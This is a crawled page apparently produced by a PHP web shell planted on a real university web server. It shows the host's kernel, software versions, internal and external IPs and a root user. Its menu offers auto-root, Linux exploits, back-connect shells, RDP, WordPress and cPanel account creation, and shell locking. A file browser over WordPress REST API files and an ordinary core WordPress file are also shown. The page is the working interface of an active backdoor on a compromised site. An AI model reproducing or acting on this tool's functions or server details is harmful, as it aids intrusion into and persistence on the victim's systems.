Linux web-conference.aiou.edu.pk 5.4.0-205-generic #225-Ubuntu SMP Fri Jan 10 22:23:35 UTC 2025 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.144.103.27
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
aaou /
wp-includes /
rest-api /
endpoints /
[ HOME SHELL ]
Name
Size
Permission
Action
class-wp-rest-application-pass...
23.59
KB
-rw-rw-r--
class-wp-rest-attachments-cont...
43.16
KB
-rw-rw-r--
class-wp-rest-autosaves-contro...
14.42
KB
-rw-rw-r--
class-wp-rest-block-directory-...
9.72
KB
-rw-rw-r--
class-wp-rest-block-pattern-ca...
4.55
KB
-rw-rw-r--
class-wp-rest-block-patterns-c...
8.81
KB
-rw-rw-r--
class-wp-rest-block-renderer-c...
5.7
KB
-rw-rw-r--
class-wp-rest-block-types-cont...
24.63
KB
-rw-rw-r--
class-wp-rest-blocks-controlle...
3.1
KB
-rw-rw-r--
class-wp-rest-comments-control...
56.23
KB
-rw-rw-r--
class-wp-rest-controller.php
18.62
KB
-rw-rw-r--
class-wp-rest-edit-site-export...
2.07
KB
-rw-rw-r--
class-wp-rest-global-styles-co...
20.12
KB
-rw-rw-r--
class-wp-rest-global-styles-re...
13.92
KB
-rw-rw-r--
class-wp-rest-menu-items-contr...
31.68
KB
-rw-rw-r--
class-wp-rest-menu-locations-c...
8.32
KB
-rw-rw-r--
class-wp-rest-menus-controller...
16.44
KB
-rw-rw-r--
class-wp-rest-navigation-fallb...
5.05
KB
-rw-rw-r--
class-wp-rest-pattern-director...
12.77
KB
-rw-rw-r--
class-wp-rest-plugins-controll...
27.86
KB
-rw-rw-r--
class-wp-rest-post-statuses-co...
10.08
KB
-rw-rw-r--
class-wp-rest-post-types-contr...
12.63
KB
-rw-rw-r--
class-wp-rest-posts-controller...
94.78
KB
-rw-rw-r--
class-wp-rest-revisions-contro...
24.67
KB
-rw-rw-r--
class-wp-rest-search-controlle...
11.04
KB
-rw-rw-r--
class-wp-rest-settings-control...
10.05
KB
-rw-rw-r--
class-wp-rest-sidebars-control...
15.36
KB
-rw-rw-r--
class-wp-rest-site-health-cont...
9.61
KB
-rw-rw-r--
class-wp-rest-taxonomies-contr...
13.22
KB
-rw-rw-r--
class-wp-rest-template-autosav...
7.52
KB
-rw-rw-r--
class-wp-rest-template-revisio...
8.08
KB
-rw-rw-r--
class-wp-rest-templates-contro...
30.49
KB
-rw-rw-r--
class-wp-rest-terms-controller...
33.16
KB
-rw-rw-r--
class-wp-rest-themes-controlle...
19.42
KB
-rw-rw-r--
class-wp-rest-url-details-cont...
20.07
KB
-rw-rw-r--
class-wp-rest-users-controller...
46.38
KB
-rw-rw-r--
class-wp-rest-widget-types-con...
18.31
KB
-rw-rw-r--
class-wp-rest-widgets-controll...
25.86
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-wp-rest-blocks-controller.php
<?php /** * Synced patterns REST API: WP_REST_Blocks_Controller class * * @package WordPress * @subpackage REST_API * @since 5.0.0 */ /** * Controller which provides a REST endpoint for the editor to read, create, * edit, and delete synced patterns (formerly called reusable blocks). * Patterns are stored as posts with the wp_block post type. * * @since 5.0.0 * * @see WP_REST_Posts_Controller * @see WP_REST_Controller */ class WP_REST_Blocks_Controller extends WP_REST_Posts_Controller { /** * Checks if a pattern can be read. * * @since 5.0.0 * * @param WP_Post $post Post object that backs the block. * @return bool Whether the pattern can be read. */ public function check_read_permission( $post ) { // By default the read_post capability is mapped to edit_posts. if ( ! current_user_can( 'read_post', $post->ID ) ) { return false; } return parent::check_read_permission( $post ); } /** * Filters a response based on the context defined in the schema. * * @since 5.0.0 * @since 6.3.0 Adds the `wp_pattern_sync_status` postmeta property to the top level of response. * * @param array $data Response data to filter. * @param string $context Context defined in the schema. * @return array Filtered response. */ public function filter_response_by_context( $data, $context ) { $data = parent::filter_response_by_context( $data, $context ); /* * Remove `title.rendered` and `content.rendered` from the response. * It doesn't make sense for a pattern to have rendered content on its own, * since rendering a block requires it to be inside a post or a page. */ unset( $data['title']['rendered'] ); unset( $data['content']['rendered'] ); // Add the core wp_pattern_sync_status meta as top level property to the response. $data['wp_pattern_sync_status'] = isset( $data['meta']['wp_pattern_sync_status'] ) ? $data['meta']['wp_pattern_sync_status'] : ''; unset( $data['meta']['wp_pattern_sync_status'] ); return $data; } /** * Retrieves the pattern's schema, conforming to JSON Schema. * * @since 5.0.0 * * @return array Item schema data. */ public function get_item_schema() { if ( $this->schema ) { return $this->add_additional_fields_schema( $this->schema ); } $schema = parent::get_item_schema(); /* * Allow all contexts to access `title.raw` and `content.raw`. * Clients always need the raw markup of a pattern to do anything useful, * e.g. parse it or display it in an editor. */ $schema['properties']['title']['properties']['raw']['context'] = array( 'view', 'edit' ); $schema['properties']['content']['properties']['raw']['context'] = array( 'view', 'edit' ); /* * Remove `title.rendered` and `content.rendered` from the schema. * It doesn't make sense for a pattern to have rendered content on its own, * since rendering a block requires it to be inside a post or a page. */ unset( $schema['properties']['title']['properties']['rendered'] ); unset( $schema['properties']['content']['properties']['rendered'] ); $this->schema = $schema; return $this->add_additional_fields_schema( $this->schema ); } }
Close